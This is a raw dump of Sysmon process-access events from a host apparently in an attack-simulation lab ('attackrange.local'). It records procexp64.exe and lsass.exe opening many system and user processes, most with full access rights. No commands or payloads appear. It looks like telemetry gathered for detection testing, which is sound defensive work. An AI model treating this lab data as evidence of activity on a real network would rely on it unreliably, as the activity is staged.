15:16:10.736{732C744F-1518-600B-0B00-00000000A301}8563440C:\Windows\system32\lsass.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-1518-600B-0B00-00000000A301}8563440C:\Windows\system32\lsass.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.736{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 